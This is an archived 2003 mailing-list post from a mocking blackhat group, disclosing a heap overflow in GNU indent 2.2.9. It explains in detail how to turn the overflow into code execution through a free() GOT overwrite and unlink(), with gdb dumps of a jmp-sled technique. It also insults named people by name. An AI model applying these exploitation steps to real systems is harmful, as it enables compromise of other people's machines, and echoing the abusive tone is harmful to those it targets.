| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200312261310.hBQDAWMJ081601@mailserver2.hushmail.com>
Date: Fri, 26 Dec 2003 05:10:31 -0800
From: "Winnie The Pooh Hacking Squadron" <wtphs@...h.com>
To: full-disclosure@...ts.netsys.com
Cc: bugtraq@...urityfocus.com
Subject: Winnie The Pooh Hacking Squadron Presents: 0day 31337 vulnerability in indent 2.2.9
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
XXXX
XX XX
XXXX XX XX
XXX XX XX XX
XX XX XXXX XX XX
XX XX XXXX XX
XX XX XXX XX
XX XX XXX XX
XX XXX XX
XX XXX
XX XX
XX XX
XXXX XX
XX XX
XX XX
XX X XX
XX XXX XX
XX XX XX
XXX XX XX
XXX XXXX XX
XXX XXX XX
XXX XXXX
XXX XXXXX
XX XXXXX
XX XXXX
XX XX XXX
XXXXXXXX X XX
XX.....XXXXX XX XX
XX.......XXXXXXX XX XX XX
XX............XXXXXXX XX XX XXX
XX..X..............XXXXXX XXXXXXXXXX
XXX....................XXXX XX
XX........................XXXX XXXXX
XX.............................XXXX..XX
XX.................................XX..XX
XX......................................XX
XXX.......................................XX
XXXX.........................................XX
XXX...................X........................XX
XXXXXXX...............X...........................XX
XX XXXX...........XX..........................XX
XX XXX.......XX............................XX
XX XXX...XX..............................XX
XX XXXX....XXXXXXXXXXXXXXXXXX..........XX
XX XXXXXXXX XXXXXXXXXXXXXX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX XX
XX XX X XXX
XX XX XX
XX
XX XX XX
XX
XX XX XX
XX
XX XX XX
XX
XX XX XX
XX
XX XX XX
XX
XX XX X XX
XX
XX XXX XX X XXXX
XX
XXXX XX XX XX XX
XXXXXX
XX XX XXX XX
XXXX XXX XX
XX XXX XX
XX XX XX
XX XX XX
XX XX XX
XXXX XX XX
XXX XX XX XXX
XX XX XX XXX
XX XX XXXXXXX
XX XX XXX XXX
XX XX XXX XXX XX
XX XXX XX XXX XX
XX XX XX XX XX
XX XXX XX XX XX XX
XX XXXXX XX XX XX XX
XX XX XX XXXX XX XX
XX X XX XXX XX XX
XX XX XX XX XX
XX XX XX XX XX
XX XX XX XX XX
XX XX XX XX XX
XX XX XX XX XX
XXX XXX XX XXX
XXXXX XXX XXX
XXXXX
. . .___.. .__ .
| |*._ ._ * _ | |_ _ [__) _ _ |_
|/\||[ )[ )|(/, | [ )(/, | (_)(_)[ )
. . . __. .
|__| _. _.;_/*._ _ (__ _.. . _. _|._. _ ._
| |(_](_.| \|[ )(_] .__)(_](_|(_](_][ (_)[ )
._| |
.__ ,
[__)._. _ __ _ ._ -+- __ *
| [ (/,_) (/,[ ) | _) *
Software: indent
Version: 2.2.9
Vulnerability: buffer overflow while parsing .c file
Found date: Aug 2002
Release date: today you stupid whitehat boy
Researchers: Winnie The Pooh Hacking Squadron
Favourite food: whitehat soup
[0] LICENSE
1) No whitehat whore can use this in his pseudo-security work
2) divineint can't trade exploit attached to this advisory on
#darknet@...et nor other lame channel (for people who don't
know it yet - his new nick is illumanti(z), is he hidding ?!)
3) Every hacker can implement exploit for this vuln in his
codes to protect them from script kiddies and whitehats.
4) WtPHS strongly encourage hackers to use this against
whitehats.
5) WtPHS don't give a shit if you hurt yourself
[1] INTRO
indent is really fucking leet tool that improves appearance
of C source code. It was designed to help people reading
sources written by damn stupid and unskilled programmers like
You Dong-Hun or Theo the Radt. It is really helpful nowadays
because of that whores who think they are coders. Unfortunatelly
authors of indent also made their software vulnerable to buffer
overflow.
[2] DETAILS
handle_token_colon(...) is vulnerable function. Buffer overflow
occurs while parsing text (from .c file of korz), which indent
treat like label. It copies whole 'label' to, 1000 bytes long,
buffer on heap, without bounds checking. (Note for divineint-alike
people: such overflow can lead to overwrite of heap stuctures and
as result of this - arbitrary code execution).
This is vulnerable part of handle_token_colon(...) function:
for (t_ptr = s_code; *t_ptr; ++t_ptr)
{
*e_lab++ = *t_ptr; /* turn everything so far into a label
*/
}
(Note for gorion(*)-alike people: this loop will copy as long as NULL
byte will be find in source string)
[3] EXPLOITATION
This section is needed for stupid people like divineint or Lorenzo
Hernandez Garcia-Hierro (Good Lord! I feel like in south-american
telenovel saing his name).
Smart people choose clear_buf_break_list() function to cause code
execution. This function is executed just after our vulnerable loop,
so we don't risk application crash. indent breaks source code and
makes double-linked list (buf_break_list) of code parts. Mentioned
function free()'s all buf_break_list entries.
This double-linked list entries are allocated after 'labbuf' (e_lab
points to labbuf) so we are able to overwrite it.
Now exploitation is very easy. Overwrite free() GOT entry with and
make clear_buf_break_list() loop run once again by setting 'prev'
field of buf_break_st_ty struct to some readable value.
Exploit for this vulnerability for indent 2.2.9 from slackware 9.0
is attached to this advisory.
NOTICE!!!! QUIZ FOR KIDDIES:
-----------------------------------------------------------------
- ----
This exploit have simple execve(shell) shellcode. What do you have
to
change to make this exploit useful ?
-----------------------------------------------------------------
- ----
FIRST PERSON WHO SENDS US GOOD ANSWER WINS OpenSSH Buffer Management
Vulnerability REMOTE EXPLOIT ... DON'T WAIT !! DO IT NOW!
[4] EDUCATIONAL VALUE
Whats educational here? One technique used in this exploit. Lets call
FD = WHAT and BK = WHERE-8. People with IQ > 75 knows that unlink()
will do *(WHAT+0xc)=(WHERE-8) except *((WHERE-8)+8) = WHAT.
If we point WHAT to NOPs before our shellcode, unlink() will change
few of our NOPs to something else. Executing this 'somethingelse'
will probably crash our application. It looks like this:
Before unlink():
(gdb) x/20i 0x805b440
0x805b440: nop
0x805b441: nop
0x805b442: nop
0x805b443: nop
0x805b444: nop
0x805b445: nop
0x805b446: nop
0x805b447: nop
0x805b448: nop
0x805b449: nop
0x805b44a: nop
0x805b44b: nop
0x805b44c: nop
0x805b44d: nop
0x805b44e: nop
0x805b44f: nop
0x805b450: nop
0x805b451: nop
0x805b452: nop
0x805b453: nop
(gdb) x/x 0x8058dc8
0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x40019f52
After unlink():
(gdb) x/x 0x8058dc8
0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x0805b440
(gdb) x/20i 0x805b440
0x805b440: nop
0x805b441: nop
0x805b442: nop
0x805b443: nop
0x805b444: nop
0x805b445: nop
0x805b446: nop
0x805b447: nop
0x805b448: nop
0x805b449: nop
0x805b44a: nop
0x805b44b: nop
0x805b44c: rorb $0x90,0x90900805(%ebp)
0x805b453: nop
0x805b454: nop
0x805b455: nop
0x805b456: nop
0x805b457: nop
0x805b458: nop
0x805b459: nop
Next call to free() will jump to 0x805b440. If execution flow will
reach 0x805b44c, program will crash at this instruction.
Solution is simple, however WtPHS don't remember anybody describing
it before, so ... here it is: Instead of NOPs you can use relative
jmp's like this:
Before unlink():
(gdb) x/20i 0x805b440
0x805b440: jmp 0x805b44a
0x805b442: jmp 0x805b44c
0x805b444: jmp 0x805b44e
0x805b446: jmp 0x805b450
0x805b448: jmp 0x805b452
0x805b44a: jmp 0x805b454
0x805b44c: jmp 0x805b456
0x805b44e: jmp 0x805b458
0x805b450: jmp 0x805b45a
0x805b452: jmp 0x805b45c
0x805b454: jmp 0x805b45e
0x805b456: jmp 0x805b460
0x805b458: jmp 0x805b462
0x805b45a: jmp 0x805b464
0x805b45c: jmp 0x805b466
0x805b45e: jmp 0x805b468
0x805b460: jmp 0x805b46a
0x805b462: jmp 0x805b46c
0x805b464: jmp 0x805b46e
0x805b466: jmp 0x805b470
After unlink():
(gdb) x/10i 0x805b440
0x805b440: jmp 0x805b44a
0x805b442: jmp 0x805b44c
0x805b444: jmp 0x805b44e
0x805b446: jmp 0x805b450
0x805b448: jmp 0x805b452
0x805b44a: jmp 0x805b454
0x805b44c: rorb $0xeb,0x8eb0805(%ebp)
0x805b453: or %ch,%bl
0x805b455: or %ch,%bl
0x805b457: or %ch,%bl
(gdb) x/10i 0x805b454
0x805b454: jmp 0x805b45e
0x805b456: jmp 0x805b460
0x805b458: jmp 0x805b462
0x805b45a: jmp 0x805b464
0x805b45c: jmp 0x805b466
0x805b45e: jmp 0x805b468
0x805b460: jmp 0x805b46a
0x805b462: jmp 0x805b46c
0x805b464: jmp 0x805b46e
0x805b466: jmp 0x805b470
This way we jumped over shitty instruction. These jmps
will lead execution flow to our shellcode, but to be sure
that no jmp will jump into middle of shellcode you have
to put few (at least 8) NOPs before shellcode. Than last
jmp will jump to NOPs and than shellcode will be executed
properly.
[5] IMPACT
Possible impact is quite big. For example companies and software
developers that are terrified because of their software is damn
shitty (Cisco, Apache, OpenBSD, Linux Kernel first come to our
mind) could implement exploit for this vuln into their source
codes to make hackers life difficult.
[6] FLAMES, SHOUTOUTS and FINAL NOTES
*) no, divineint, you can't get our juarez - stop begging for it
biatch
*) no, Stefan Esser, you can't steal our juarez and public it
as your own, because you are to stupid to own us.
*) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron
*) shoutouts to PHC for terrorizing whitehats and full-disclosure
*) recent OpenSSH vulnerability is exploitable
*) greetings to Lorenzo Hernandes Garcia-Hierro for making us
laught on the floor while reading his posts.
*) kudos to Alan Alexander Milne (R.I.P - 1956)
[7] OUTRO
the end...
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.3
wkYEARECAAYFAj/sM6EACgkQYE4zNxPdkhNhpACfc5C40UAJ7K8ybtvg6o6uXUzhoR0A
oI+4wR01MMKbGwVqDdpjIxXRrzX7
=eC7E
-----END PGP SIGNATURE-----
Download attachment "WinnieThePooh-indent-2.2.9-0day.tar.bz2" of type "application/x-bzip2" (1511 bytes)
View attachment "WinnieThePooh-indent-2.2.9-0day.tar.bz2.sig" of type "text/plain" (277 bytes)
Powered by blists - more mailing lists